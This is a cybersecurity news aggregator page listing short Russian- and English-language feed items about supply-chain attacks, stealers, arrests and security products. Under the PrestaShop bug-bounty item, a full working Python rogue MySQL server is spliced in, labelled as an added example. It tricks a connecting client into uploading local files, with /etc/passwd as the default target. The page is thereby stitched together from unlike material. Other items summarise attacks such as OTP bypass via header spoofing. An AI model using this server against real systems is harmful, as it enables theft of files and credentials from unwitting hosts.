Cybersecurity
A collection of cybersecurity resources
In Russian 🇷🇺
Securitylab
last post 1 hour ago
SIEM, SOAR and XDR: which tool delivers truly impenetrable protection?

Solutions that will make hackers surrender without a fight.

1 hour ago @ securitylab.ru
AI in the service of marketing: Growk AI cracks the codes of Eastern and Western markets

The developers are ready to take on the COMEUP 2024 festival.

13 hours ago @ securitylab.ru
Sovereign internet in action: a test in Dagestan

WhatsApp, Telegram and YouTube disappeared in the republic.

13 hours ago @ securitylab.ru
Helicopter + jet: the X-plane defies the laws of aerodynamics

Vertical takeoff, supersonic flight and other impossible features of Bell's aircraft.

14 hours ago @ securitylab.ru
GitHub on fire: hackers turned the Ultralytics library into a crypto mine

Just one line of code opened access to millions of downloads.

18 hours ago @ securitylab.ru
TikTok's last days? The company's strength in its fight with the US is running out

The Supreme Court is ByteDance's only (but very fragile) hope.

21 hours ago @ securitylab.ru
Small Xiaohong chip, big changes: how China crossed the 500-qubit threshold

The new quantum computer poses yet another challenge to IBM and Google.

21 hours ago @ securitylab.ru
Zero-day attack in Windows: hackers can steal a password when a file is simply viewed

A new security challenge for all versions of Windows.

1 day, 1 hour ago @ securitylab.ru
Spy wire: tomography exposes the danger of an ordinary USB-C cable

A USB-C cable under X-ray revealed hidden spy modules.

1 day, 1 hour ago @ securitylab.ru
A quantum radar for sensing targets hundreds of kilometres away has been developed

A new remote sensing method changes ideas about imaging.

1 day, 2 hours ago @ securitylab.ru
Detecting scars in spacetime: how LIGO detectors read the memory of stellar explosions

Scientists reveal the secret of the gravitational memory of supernovae.

1 day, 16 hours ago @ securitylab.ru
Roskomnadzor is preparing a purge of foreign hosting providers

How will it affect the market?

1 day, 19 hours ago @ securitylab.ru
Real diamonds can now be created from scratch in the laboratory in just 15 minutes

New synthesis methods will lead to lower diamond prices worldwide.

2 days, 1 hour ago @ securitylab.ru
Kompromat wars: the world's largest archive of leaked classified materials is unveiled

DDoSecrets launches a global data library.

2 days, 1 hour ago @ securitylab.ru
Superconductivity against nature: a scientific turn that changes our understanding of matter

We explain how carbon layers change the laws of physics.

2 days, 12 hours ago @ securitylab.ru
Anti-Malware
last post 2 days, 20 hours ago
SOC Forum 2024: what matters more for the development of information security, competition or cooperation?

Plenary session at SOC Forum 2024. Risks are amplified by unreliable content, which has a harmful effect, especially on children.

So at SOC Forum 2024 one could expect an answer to the question of how well these tasks have been solved.

Meeting of the international section at SOC Forum 2024. Cooperation between players, or fierce competition?

Participants in the plenary session on the competitive advantages of infosec at SOC Forum 2024. An "algorithm" for finding such niches was suggested by Igor Dusha, director of the infosec product portfolio at NOTA KUPOL (T1 Holding).

Can all market participants already invest in developing their infosec systems to the same extent as large companies do?

2 days, 20 hours ago @ anti-malware.ru
Monitoring and response: from a service model to an in-house SOC

Options for launching monitoring and response. The choice of SOC launch scheme depends on the organisation's characteristics, the maturity of its processes and the specifics of its infrastructure.

The company does not consider it worthwhile to invest in building its own SOC, but understands the importance and necessity of the incident monitoring and response function.

Based on these data, the SOC concept, the roadmap for creating and developing the SOC, and the financial and economic justification are formed.

Cyber threats relevant to the company. It is necessary to define the threat landscape relevant to the company.

First, this makes it possible to correctly prioritise the connection of event sources and to select the tools needed for monitoring and response, …

2 days, 23 hours ago @ anti-malware.ru
Review of CICADA8 ETM, a vulnerability and digital threat management service

The CICADA8 ETM service is intended for managing vulnerabilities on the external perimeter, brand protection, searching for corporate data in the public domain and on the darknet, and analysing the information field.

The CICADA8 ETM digital threat management platform is designed for continuous analysis of gaps in the IT infrastructure and for minimising the risk of their being used for further unlawful actions.

Advantages of the CICADA8 ETM service over a pentest. The service is built on the CICADA8 team's experience in various areas of infosec.

Exporting assets in XLS format in CICADA8 ETM. If questions arise about a specific asset, they can be asked in the corresponding section of its card.

Vulnerability management in CICADA8 ETM. As in oth…

3 days, 23 hours ago @ anti-malware.ru
Secure by Design: how to implement the constructive cybersecurity approach in practice

Together with AM Live experts, let's work out which principles underlie the Secure by Design approach and what the process of ensuring constructive cybersecurity consists of.

The results of the first poll among viewers of the broadcast showed how familiar they are with the concept of constructive cybersecurity.

Vladimir Karantaev described his approach to assessing constructive security: a decision support system plus digital twins.

Components of a successful constructive cybersecurity project: expert opinions. Vladimir Karantaev: "The main thing is to build in security as a product property."

Conclusions. Constructive cybersecurity is an approach that focuses att…

4 days, 17 hours ago @ anti-malware.ru
Review of Ideco NGFW 18, a universal next-generation firewall

A demo stand will help us see Ideco NGFW in action: we will carry out a series of actions in the administrator web console based on a popular use case.

Functional capabilities of Ideco NGFW. Let's start with the main functions that were available before the Ideco NGFW 18 release.

The implementation of DNS filtering in Ideco NGFW also provides an additional line of defence against NGFW bypass.

Device VPN is an operating mode of another product, Ideco Client, in which the client device is authorised in Ideco NGFW without the user logging in to the system.

System requirements for Ideco NGFW. The choice of optimal server hardware configuration depends directly on the load placed on Ideco NGFW, so it is necessary to take into account the following fac…

4 days, 23 hours ago @ anti-malware.ru
Review of BI.ZONE EDR 1.35, an endpoint protection system against advanced cyber threats

BI.ZONE EDR at every stage of the incident lifecycle. Threat Prediction, automated detection of misconfigurations. To limit an attacker's ability to develop an attack, BI.ZONE EDR uses the Threat Prediction module.

Threat Detection, attack detection. Telemetry collection. To detect threats, BI.ZONE EDR collects a large volume of telemetry from endpoints.

Users can also develop their own telemetry collection and threat detection policies depending on the specifics of the infrastructure and the types of endpoints.

Host isolation in BI.ZONE EDR. Here you can also install the modules needed for BI.ZONE EDR to perform its assigned tasks effectively.

Viewing events in BI.ZONE ED…

5 days, 21 hours ago @ anti-malware.ru
How to help the CEO build information security

But what requirements, and to what extent, should the CEO impose on subordinates?

Responsibility for infosec in a company: direct or indirect?

Similar cases, she says, also occurred in Russia in 2023.

Key elements of monitoring infosec resilience in a company. The board of directors and the cybersecurity culture within the company. The person responsible for infosec development is the chief executive officer (CEO).

How to improve the quality of board oversight of infosec. From theory to practice. We have already noted that the event was organised by Solar Group.

1 week, 2 days ago @ anti-malware.ru
Can fines for data leaks raise the low level of infosec in Russian companies?

The general topic of discussion was the development of legislative regulation in the field of infosec, and the specific subject was the question of fines for data leaks.

The business position. Alexey Volkov, vice president for infosec at Beeline, takes a different approach to assessing the situation.

Under these conditions, data leaks are aimed first of all not at obtaining unique information about a person (everything about them is already known anyway).

Even if a company spends 100 % of its budget on infosec, the attackers' budget is still larger."

Punishing an infosec department that lacked the appropriate means to prevent a leak does not look like something that favours the development of the security system.

1 week, 2 days ago @ anti-malware.ru
The future of domestic network equipment: innovation and security

The situation on the network equipment market. Since 2022, domestic solutions, including network equipment, have been actively developing on the market.

What network equipment is mainly used in your company?

What to look for when choosing Russian network equipment?

In the opinion of viewers who took part in the poll, everything needs to be improved: functionality, service and support quality, and performance and compatibility.

Alexander Barinov spoke about the trend toward integrated design of cybersecurity and network equipment, where IT and infosec must work in tandem.

1 week, 2 days ago @ anti-malware.ru
How the ARinteg solution helps organise personal data accounting in 1C

The "Personal Data Accounting" module is an ARinteg product that keeps up to date the internal documents required when processing personal data in accordance with Law 152-FZ.

Introduction. The "Personal Data Accounting" (UPDn) module from ARinteg is an add-on (extension) to the 1C "Payroll and HR Management" configuration.

Description of the "Personal Data Accounting" module. The module was created in response to the requirements of the relevant legislation and to help specialists who manage the enterprise's document flow under 152-FZ.

Components of the "Personal Data Accounting" module. Reference books. The component contains reference materials on the basis of which the acc…

1 week, 3 days ago @ anti-malware.ru
Review of DCImanager 6, a platform for managing IT infrastructure

DCImanager 6 is a system from ISPsystem for managing racks, servers, networks, power distribution units and UPSs in a multi-vendor infrastructure.

Introduction. DCImanager 6 is a Russian platform developed by ISPsystem for managing multi-vendor IT infrastructure in data centres and server rooms.

DCImanager 6 includes ready-made services for monitoring the state of the physical infrastructure and sending alerts, a permissions management system, and diagnostic mechanisms.

Data centre map. Visualisation of equipment placement in racks and the data centre. This function simplifies management of the physical infrastructure and helps quickly find free slots for installing new equipment.

Hardware requirements. When usi…

1 week, 3 days ago @ anti-malware.ru
The concept of continuous security: closing the gap between three vectors in cybersecurity

In that case, the main task of the continuous security concept is to make the gap between all three vectors minimal.

In the training example, such software collects data into a file and does not send it to the "attacker".

Fortunately, vendors do not stand still and help not only with defence against sophisticated targeted attacks but also at lower levels.

Main functions of Kaspersky NDR. Conclusions. We have examined the concept of continuous security, as well as the possibilities and ways to close the gap between the three vectors in infosec, especially between attackers' skills and the functionality of security tools.

Implementing new expensive solutions may be suboptimal without building synergy between tools and taking several aspects into account at once …

1 week, 3 days ago @ anti-malware.ru
Cybersecurity ecosystems: optimising protection through integration

A big task can be covered, but it often happens that an ecosystem includes one good product while the rest fall short in quality.

Until they see more value in cooperation than in competition, there will be no growth of ecosystems on the cybersecurity market.

According to Vladimir Bengin, the poll shows that customers have become disillusioned with working with a single vendor and with that vendor's ability to solve security problems.

The process of selecting solutions varies, but on the whole the migration away from foreign products can be combined with building an ecosystem.

The results of the third poll showed that when choosing a cybersecurity ecosystem, the breadth of the product and service line remains important for users.

1 week, 4 days ago @ anti-malware.ru
How passwordless authentication saves companies from the newest cyber threats

Keys on physical media, although they have additional protection in the form of PIN codes, are still at risk of theft and (in some cases) duplication.

The path to Passkey. The transition to Passkey begins with the use of traditional, phishable authentication factors such as login and password.

No more spending on: processing access recovery tickets, creating and updating passwords for employees, maintaining password storage infrastructure, and training users on password policies.

The browser sends a JSON response containing the authentication results and the associated client data to the relying party's server (5).

Technical specialists will help you get orien…

1 week, 4 days ago @ anti-malware.ru
The Russian network equipment market: new realities after sanctions

It went so far that the company decided to dispose of its equipment in Russian warehouses worth almost 2 billion roubles!

Assessment of the Russian network equipment market from 2019 to 2023. According to data from the Russian analytics company J'son & Partners Consulting, the domestic network equipment market grew by 23.5 % from 2019 to 2023, reaching 784 billion roubles.

Unfamiliarity of Russian equipment for the market. The Russian market was long oriented toward Western equipment, and many specialists are not ready to move to new systems.

Production of various types of network equipment in Russia. The Russian network equipment market is actively developing, stimulating domesti…

1 week, 5 days ago @ anti-malware.ru
Habr: Information Security
last post 13 hours ago
How I hacked one of the top neural networks (Claude 3.5 Sonnet) for a student research paper

Being an adventurer, I chose a topic that was closer and more interesting to me... and it so happened that in the heat of enthusiasm I somewhat overfulfilled my plan.

Claude stands out among language models for the following characteristics: Multimodality: able to work effectively with text in various formats as well as with images, demonstrating a high level of computer vision.

An image is created of "big pharma" as a ruthless machine interested only in profit, not in children's health.

In reality, I ended up with a fairly powerful tool in my hands, and I have no idea what to do with it next.

Of course, I did not use it for any bad purposes; almost immediately after its …

13 hours ago @ habr.com
A ZIP bomb in Apache Parquet format

For example, in Apache Parquet format. Recall that historically a ZIP bomb (file bomb or archive of death) was an archive file whose unpacking could hang the operating system or a working application by filling all free space on the storage medium or in RAM/working memory.

Apache Parquet is a free columnar data storage format for Apache Hadoop-type databases.

It is similar to RCFile, ORC and other columnar file storage formats in Hadoop and is compatible with most Hadoop data processing frameworks.

Then I put references to this dictionary entry using run-length encoding in Parquet.

As already mentioned, Parquet files contain one or more …

13 hours ago @ habr.com
From CNAPP to CTEM: infosec terms in plain language

We explain in plain language the common terms for mechanisms and solutions that protect various environments: from access rights management to firewalls.

Three quarters of respondents noted that their organisation uses CNAPP to protect a multi-cloud environment.

PAM. According to a 2018 study by the consulting company Forrester, 80% of breaches were related to the compromise of privileged credentials.

According to a study by IBM conducted this year, in 75% of cases the damage from a breach to organisations grew due to the cost of remediation.

According to Gartner forecasts, organisations investing in CTEM-based security will achieve a reduction in the number of breaches by two…

14 hours ago @ habr.com
Analysis of Telegram accounts

Stage 2. Finding various information about the user with the help of bots. Insight. The best freemium bot for Telegram account reconnaissance.

Here we are greeted by many items after we entered the id of the target account; let's quickly look at all the items available to us.

The bot generously shares this currency with you on your first visit, giving you a whole 20 crystals.

Unfortunately, it is not as generous with its internal currency as the previous bots, but it also does not spend it if it did not find information.

Conclusion. We hope that the bots described in this article will help in investigations and in building up the experience of enthusiasts.

20 hours ago @ habr.com
[Translation] OTP bypass and admin panel takeover via Header Injection

This means that changing the client's IP address, or the IP address presented to the server, can help bypass this restriction and continue brute-forcing the OTP.

As expected, I managed to brute-force the OTP and achieve a successful login via OTP.

It was obvious that there was a Header Injection vulnerability, so besides bypassing the IP control or rate limiting, there could be other opportunities for exploitation.

If the X-Forwarded-For: 127.0.0.1 header is set, the server will consider that access is coming from an internal IP address and will allow the user to access restricted content.

And beyond that, I successfully performed horizontal privilege escalation (although I did not try to log in to the …

1 day, 20 hours ago @ habr.com
Top infosec news for November 2024

To the accompaniment of Sber's estimates, the well-known bookmaker 1WIN decided to finish off the remaining not-yet-leaked data of Russians and others.

Although the question here is not so much who carried out the attack (there are plenty of willing parties) but why IP spoofing is still a problem in 2024.

Good news: the bootkit is an early proof of concept, not an attack tool spotted in the wild, and it is tailored only to a few Ubuntu versions, not the kernel in general.

And in essence, awareness has clearly increased not only among infosec specialists but also among those who would not mind using such a bootkit at all.

Which is, generally speaking, fair.

2 days, 20 hours ago @ habr.com
Diving into the matrix: how MITRE ATT&CK helps fight APT groups

In fact, the abbreviation stands for Endpoint Detection and Response, which can be translated as "detection and response on endpoint devices".

Next we will analyse the activity of four well-known APT groups and look at how MaxPatrol EDR and MITRE ATT&CK help protect against their attacks.

The authors of Decoy Dog did their best to make it as hard as possible to detect, not only in traffic but also in the file system.

In this case, the modules for terminating processes, deleting files and quarantining them will help neutralise the threat.

💥 Dark River: a high-tech backdoor and attacks on the defence industry. Hackers from Dark River, like those from ExCobalt, are interested in cyber espionage.

2 days, 21 hours ago @ habr.com
Bots and services for reconnaissance of VKontakte data

They do not call for action and are only data for familiarisation and for studying the mechanisms of the technologies used.

So a random person adds you as a friend and you don't understand who it is or where they came from.

You open this app, go to this section and see that this person knows you through your acquaintances and that everything is fine.

And now we simply enter the person's first and last name, after which we see and verify the first 6 digits of the number.

We go to the bot that must not be named, enter the last name and first name, and we get the result of hidden numbers.

2 days, 22 hours ago @ habr.com
Specifics of using third-party services in mobile apps, using Firebase as an example

Today almost every mobile development involves the use of third-party services, and Firebase, developed by Google, has become one of the most popular.

To use the services described above, we first need to initialise Firebase in code using the data issued when creating a project in its console.

All we got was a message in the Firebase console that we had used up half of the requests, after which the paid plan begins.

In this section I would like to collect the most interesting problems we have encountered in Firebase services in a wide variety of applications.

FCM/GCM server keys. Yes, even though it is 2024, some applicat…

3 days ago @ habr.com
How to reliably erase secret information from a database

And since we are developing Natch, an attack surface discovery tool, all problems look like nails, so we decided to use it to investigate data flows in a DBMS.

The thing is that Natch does not yet track the propagation of tainted data on disk drives.

Here, as in postgres, besides the table file there are additional files with transactions: binlog and redo log.

No data flow from ib_logfile0 to grep was detected, which means MariaDB can make sure the OS does not cache this file's data in memory.

Surprisingly, the data disappeared from the table after an ordinary DELETE.

3 days, 1 hour ago @ habr.com
How to earn hundreds of millions with Excel? The experience of the RTO project

The previous team, when moving to the next stage at the project defence, "bent the truth a little" by not completing half of the items it was obliged to complete within stage 1.

There are solutions where the model is located inside the process data network (TSPD) and is not connected to the corporate data network (KSPD).

And some of the data, although at first glance normal (not Bad values or zeros), have a regular systematic error.

Configuration of the file to be sent to the user's server with the optimisation results displayed in the interface.

TimeExpire = Now + TimeValue("00:30:00") And that's it; a little more and at the output we already have a ready-made production optimisation solution with an annual effect of hundr…

3 days, 11 hours ago @ habr.com
Just like Black Mirror: which plots of the sci-fi series may soon come true

The first episodes of Black Mirror came out in 2011, and in that time some of the series' plots have come frighteningly close to reality.

So nothing prevents rendering not the real picture but additional images, from augmented reality to multimedia streams, as shown in Black Mirror.

Fintech and e-commerce are the most vulnerable industries in this respect, since they make massive use of open source code in developing client services and applications.

Criminals also take advantage of this, as happened in 2022 after a data leak at one of the largest food delivery services.

In attempts to regulate AI, one should not forget that it is a double-edged weapon that also plays on the side of cybercriminals.

3 days, 15 hours ago @ habr.com
UserGate 7: test results + migration from older versions

In this article I will talk about an issue that is relevant to many: migrating from UserGate 6 to version 7.

Under the cut I have collected everything about the advantages of UserGate v.7, with instructions for migrating to it from the previous version.

They will have action = accept set and the created L7 profile will be added.

They will contain one filter of the form "id IN (...)" that includes all the IDS signature identifiers from the old version's IDS profile.

Migrating to UserGate 7 is a simple process.

3 days, 18 hours ago @ habr.com
Acting proactively: preventing hidden threats with statistics

However, the rapid growth in the number of APIs and the increasing number of threats forced a rethink of this approach.

In response to this problem, the Вебмониторэкс development team created the ПроAPI Структура protection tool, which makes it possible to inventory all APIs, learn their composition and identify vulnerabilities.

An important addition to our solution is new functionality that makes it possible to collect statistics by route and use them for early attack detection and prompt response.

When working with APIs, the concepts of endpoint and route are used.

The new capabilities will be a useful tool for monitoring request traffic to a route, determining the start of an attack and promptly notifying users.

3 days, 18 hours ago @ habr.com
Book: "Windows Internals. Key Components and Capabilities. 7th ed."

The book's authors are two experienced professionals in operating system development and information security, Andrea Allievi and Alex Ionescu. – has held positions as a systems programmer and security specialist for more than 15 years.

He received a bachelor's degree from the University of Milano-Bicocca and, as part of his thesis project, wrote a 64-bit master boot record (MBR) manager capable of bypassing any Windows 7 kernel protections.

In 2016 Andrea joined Microsoft as a security specialist at the Microsoft Threat Intelligence Center (MSTIC).

In the past he led the development of the ReactOS kernel, an open-source Windows clone built from scratch.

Finally, this person fou…

3 days, 20 hours ago @ habr.com
Хакер Хакер
последний пост 1 day, 20 hours назад
Хакеры.RU. Chapter 0x01. Entry point

Today the rain poured down outside in a murky wall, and it did not fit at all into the plans Kirill and Sanya had so carefully thought through.

He glanced back at Sancho.

"It'll all be fine," Sancho said quietly, without raising his head.

The tram braked and flung its doors open with a clang, letting cold, rain-soaked air into the car.

Finding himself in front of the right room, the one without a sign, Kirill for a moment felt a chill of fear run down his spine.

1 day, 20 hours ago @ xakep.ru
RedLine stealer masquerades as a pirated activator for popular accounting software

Attackers are distributing the RedLine stealer on accounting forums, disguising it as a pirated HPDxLIB activator meant for popular software.

According to researchers, this malicious campaign began back in January 2024 and remains a threat to this day.

The attackers post announcements on specialised forums about running a business and bookkeeping, offering an updated version of the HPDxLIB activator for download.

Experts remind us that RedLine is distributed under the Malware-as-a-Service (MaaS) model.

The researchers believe the server may be rented by various hacking groups distributing RedLine, i.e. the version used by the attackers could have been purchased on a subscr…

2 days, 14 hours ago @ xakep.ru
Smashing PrestaShop. How I took over an online store's install on a bug bounty

In this article I will tell how one small mistake involving the installation script in the PrestaShop CMS can open the door to remote code execution.

The process is set up the same way as in other CMSes such as WordPress or Joomla.

Since this is MySQL, can we read files via a rogue MySQL server (is --enable-local-infile turned on on the client)?

But we don't want to get distracted by lengthy checks, because in the meantime someone could beat us to the installer and take it away from us.

Scanning the network every which way through a MySQL connection doesn't sound very promising and won't give us any real attack avenues.
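The "rogue MySQL" file read the article weighs, as an added example that is not the author's code: a fake MySQL server that completes the handshake with any credentials, and answers the client's first query with a LOCAL INFILE request naming the file it wants, which a client with local-infile enabled then uploads. It assumes the installer can be pointed at an attacker-controlled host:port as its database server; the target path and the port are assumptions, and the packet layouts follow the MySQL client/server protocol (Handshake v10, HandshakeResponse41, OK packet, LOCAL INFILE request).

```python
"""Rogue MySQL server that turns any client query into a LOCAL INFILE file read.

Added example for the PrestaShop installer write-up above; not code from the
article. It assumes the target application connects as a MySQL client to a
host:port the attacker controls and that its client library allows LOCAL INFILE.
"""
import socket
import struct

CLIENT_LOCAL_FILES = 0x00000080
# Capabilities we advertise in the greeting: LONG_PASSWORD | CONNECT_WITH_DB |
# LOCAL_FILES | PROTOCOL_41 | SECURE_CONNECTION | PLUGIN_AUTH
SERVER_CAPS = 0x1 | 0x8 | CLIENT_LOCAL_FILES | 0x200 | 0x8000 | 0x80000
# OK packet: header 0x00, affected_rows 0, last_insert_id 0, status AUTOCOMMIT, warnings 0
OK_PAYLOAD = b"\x00\x00\x00\x02\x00\x00\x00"


def mysql_packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def handshake_payload(conn_id=1):
    """Initial Handshake v10 (server greeting) with a fixed 20-byte scramble."""
    salt = b"A" * 20
    return (b"\x0a" + b"5.7.43-rogue\x00" + struct.pack("<I", conn_id)
            + salt[:8] + b"\x00"
            + struct.pack("<H", SERVER_CAPS & 0xFFFF)
            + b"\x21"                                  # utf8_general_ci
            + struct.pack("<H", 0x0002)                # SERVER_STATUS_AUTOCOMMIT
            + struct.pack("<H", SERVER_CAPS >> 16)
            + bytes([len(salt) + 1])                   # auth_plugin_data_len
            + b"\x00" * 10                             # reserved
            + salt[8:] + b"\x00"                       # auth_plugin_data_part_2 (13 bytes)
            + b"mysql_native_password\x00")


def local_infile_request(path):
    """Server-side LOCAL INFILE request: 0xFB followed by the file the client must send."""
    return b"\xfb" + path.encode()


def client_allows_local_infile(handshake_response):
    """HandshakeResponse41 starts with the client's 4-byte capability flags."""
    return bool(struct.unpack("<I", handshake_response[:4])[0] & CLIENT_LOCAL_FILES)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def read_packet(sock):
    """Return (seq, payload) for the next framed packet, or None on EOF."""
    header = _recv_exact(sock, 4)
    if header is None:
        return None
    length = struct.unpack("<I", header[:3] + b"\x00")[0]
    payload = _recv_exact(sock, length) if length else b""
    if payload is None:
        return None
    return header[3], payload


def serve_once(listener, target_path):
    """Handle one client; return the bytes of target_path it sent, or None."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(mysql_packet(0, handshake_payload()))
        pkt = read_packet(conn)                             # HandshakeResponse41
        if pkt is None:
            return None
        seq, response = pkt
        if not client_allows_local_infile(response):
            print("client did not advertise CLIENT_LOCAL_FILES; it will refuse the request")
        conn.sendall(mysql_packet(seq + 1, OK_PAYLOAD))     # any credentials "succeed"
        while True:                                         # wait for the first COM_QUERY
            pkt = read_packet(conn)
            if pkt is None:
                return None
            seq, cmd = pkt
            if cmd[:1] == b"\x03":
                break
            conn.sendall(mysql_packet(seq + 1, OK_PAYLOAD)) # COM_INIT_DB, COM_PING, ...
        conn.sendall(mysql_packet(seq + 1, local_infile_request(target_path)))
        data = b""
        while True:                                         # file arrives in packets
            pkt = read_packet(conn)
            if pkt is None:
                return None
            seq, chunk = pkt
            if not chunk:                                   # empty packet ends the file
                break
            data += chunk
        conn.sendall(mysql_packet(seq + 1, OK_PAYLOAD))
        return data


if __name__ == "__main__":
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", 3306))
    srv.listen(1)
    print(serve_once(srv, "/etc/passwd"))
```

The check the article raises is visible in the exchange: the client's HandshakeResponse41 carries its capability flags, and a client that does not set CLIENT_LOCAL_FILES (local-infile disabled) rejects the 0xFB request instead of sending the file, so `serve_once` reports the flag before it tries.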

2 days, 15 hours ago @ xakep.ru
A PoC exploit has appeared for a critical vulnerability in Mitel MiCollab

Security researchers have published a proof-of-concept (PoC) exploit that chains a patched critical vulnerability in Mitel MiCollab with a 0-day arbitrary file read issue.

As a result, an attacker can gain access to files on the server.

This SQL injection in the NPM component made it possible to access confidential information and perform arbitrary operations on the database.

"Successful exploitation of this vulnerability could allow an attacker to gain unauthorised access and affect the confidentiality, integrity and availability of the system," Mitel's developers report in the security bulletin dedicated to CVE-2024-41713.

In this case, the information disclosure is limited to non-confide…

2 days, 16 hours ago @ xakep.ru
Scattered Spider member arrested on suspicion of attacking US telecoms

According to law enforcement, the detainee, Remington Goy Ogletree, also known online as remi, broke into the networks of three unnamed companies.

Among other things: screenshots of phishing messages and of phishing pages harvesting credentials, as well as screenshots of crypto wallets holding tens of thousands of dollars in cryptocurrency.

"In other phishing messages, employees were told that an 'HR request' had been filed regarding them or that their 'VPN profile had been updated.'"

In particular, Scattered Spider is known for its attacks using the BlackCat (Alphv), Qilin and RansomHub ransomware, including against MGM Resorts and the Caesars Entertainment casino chain.

Last autumn…

2 days, 18 hours ago @ xakep.ru
Law enforcement seized 50 Manson Market servers and shut down the marketplace

German law enforcement confiscated more than 50 servers that hosted the Manson Market hacker marketplace, as well as fake online shops used in phishing operations.

According to Europol, the investigation into Manson Market began back in autumn 2022, after reports of phone scammers who posed as bank employees and tried to extract confidential information from victims.

It is also reported that two main suspects, who allegedly ran Manson Market, have already been arrested in Germany and Austria.

In total, more than 63,000 stolen records were sold through Manson Market.

Law enforcement also discovered on the Manson Market servers …

2 days, 20 hours ago @ xakep.ru
Russian Post (Почта России) is investigating reports of a data leak

Specialists from Data Leakage & Breach Intelligence (DLBI) warned that a small fragment of a database containing information about Russian Post shipments had been published in the open.

Russian Post representatives stated that they are already conducting a security audit and checking whether the published fragment belongs to the leak from two years ago.

Shortly after the researchers' report was published, Russian Post representatives told the media that "the company's specialists are currently conducting a security audit of the information systems and checking whether the published fragment belongs to the June 2022 leak."

At the same time, DLBI founder Ashot Oganesyan notes that the new dump clearly has nothing to do with the lea…

2 days, 22 hours ago @ xakep.ru
The Turla hacking group seized the servers of a Pakistani APT

Turla then gained access to networks that Storm-0156 had already breached (for example, in Afghan and Indian government organisations) and deployed its own malware in them.

Lumen says it tracked Storm-0156's activity for several years, and these attackers concentrated their attacks on India and Afghanistan.

Turla did not stop at compromising Storm-0156's command-and-control servers and attacking already-breached targets.

Reportedly, around mid-2023 the Russian-speaking hackers moved laterally within Storm-0156's infrastructure and reached its workstations.

It is worth noting that this is not the first time Turla has acted this way.

3 days, 11 hours ago @ xakep.ru
Luntry will hold the webinar "Image signing and validation in Kubernetes"

On December 10 at 11:00 (Moscow time) Luntry's experts will hold a free webinar on the technical aspects of working with image validation.

The webinar "Image signing and validation in Kubernetes" will be hosted by Luntry founder and director Dmitry Evdokimov and Stanislav Prosnekov, head of the DevOps department.

Dmitry and Stanislav will share their experience and answer participants' questions.

Topic: "Image signing and validation in Kubernetes". Format: free webinar. Speakers: Dmitry Evdokimov (Luntry) and Stanislav Prosnekov (Luntry). Time: December 10, 2024, 11:00 (Moscow time). Venue: https://luntry.ru/ About Luntry: Luntry's experts specialise in secur…

3 days, 14 hours ago @ xakep.ru
Data of 760,000 employees of Xerox, Nokia, Morgan Stanley and other companies leaked online

In 2023 many companies suffered from attacks on a zero-day vulnerability in MOVEit Transfer (CVE-2023-34362).

A person under the handle Nam3L3ss published on the Breached hacking forum data from companies such as Bank of America, Koch, Nokia, JLL, Xerox, Morgan Stanley and Bridgewater.

"We believe the data originates from the Cl0p extortion group, which frequently exploits such vulnerabilities to steal and publish confidential data as part of its extortion campaigns.

Nam3L3ss probably combed through terabytes of data on the dark web and repackaged it for wider use," say Atlas Privacy specialists.

Recall that last month Nam3L3ss posted another large database on BreachForums, …

3 days, 14 hours ago @ xakep.ru
Ruby with a backhand. Exploring the architecture of a Ruby application and learning to reverse it

In today's article we'll talk about Ruby, or rather about the subtleties and nuances of reversing applications written in this language.

For those who want a more detailed look at its concept and internal structure, there is the book Ruby Under a Microscope.

In short, as you have already understood, the goal of today's article is not attaining the zen of Ruby programming but a dry, practical breakdown of the peculiarities of reversing applications built on this exotic thing.

The top five calls are the native wrapper around reading the file and are of no interest to us.

Naturally, despite its declared extravagance, Ruby does exactly the same.

3 days, 16 hours ago @ xakep.ru
Germany shut down the Crimenetwork hacker marketplace

German authorities have shut down Crimenetwork, the country's largest marketplace for cybercriminals.

At the time the platform was shut down and its servers disconnected, Crimenetwork had more than 100 registered sellers and over 100,000 users, most of them located in German-speaking countries.

Users of the marketplace could pay for goods and services with Bitcoin or Monero (XMR).

As a result, law enforcement believes that since 2018 the platform's administrators have earned at least 5,000,000 dollars.

In addition to the arrest of the alleged Crimenetwork administrator, known under the handle Techmin, the BKA reports obtaining information about the platform's registered members, and says that …

3 days, 18 hours ago @ xakep.ru
A backdoor stealing private keys was planted in the Solana Web3.js library

On December 2, 2024 the Solana Web3.js package was compromised as a result of a supply-chain attack and the takeover of an account with the corresponding permissions.

As a result, a backdoor for stealing private cryptocurrency keys was injected into the library's code.

The compromised versions of Web3.js contained malicious code that let the attackers steal private keys from developers and users and, ultimately, steal other people's cryptocurrency.

"The problem is not with the Solana protocol itself but with a specific JavaScript client library, and it appears to have affected only projects that work directly with private keys," the maintainers write.

GitHub specialists warn that even removing the pack…

3 days, 20 hours ago @ xakep.ru
The DroidBot malware steals data from 77 financial and cryptocurrency apps

The new Android banking malware DroidBot seeks to steal credentials from 77 cryptocurrency and banking applications (including Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken and Garanti BBVA).

Cleafy, the company that discovered DroidBot, reports that it has been active since June 2024 and operates under the malware-as-a-service (MaaS) model.

A DroidBot subscription costs 3,000 US dollars a month, and at least 17 groups are currently using builders to customise the threat for specific targets.

Despite these harmless guises, on an infected device it acts as a trojan and seeks to steal confidential and…

3 days, 22 hours ago @ xakep.ru
Law enforcement shut down the Matrix encrypted communications platform

As a result of the international operation Passionflower, law enforcement agencies shut down the Matrix encrypted messaging platform.

Operation Passionflower was coordinated by Europol and Eurojust, with the participation of law enforcement agencies from many European countries, including France, the Netherlands, Italy, Lithuania, Spain and Germany.

It then turned out that the criminal's device had been modified, and on it was a configured connection to the Matrix service intended for encrypted communications.

The platform offered its customers its own Matrix OS, encrypted voice and video calls, encrypted messaging apps, anonymous internet access and tracking of tr…

4 days, 11 hours ago @ xakep.ru
In English 🇺🇸
The Hacker News
last post 1 day, 19 hours ago
Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions

In yet another software supply chain attack, it has come to light that two versions of a popular Python artificial intelligence (AI) library named ultralytics were compromised to deliver a cryptocurrency miner.

The versions, 8.3.41 and 8.3.42, have since been removed from the Python Package Index (PyPI) repository.

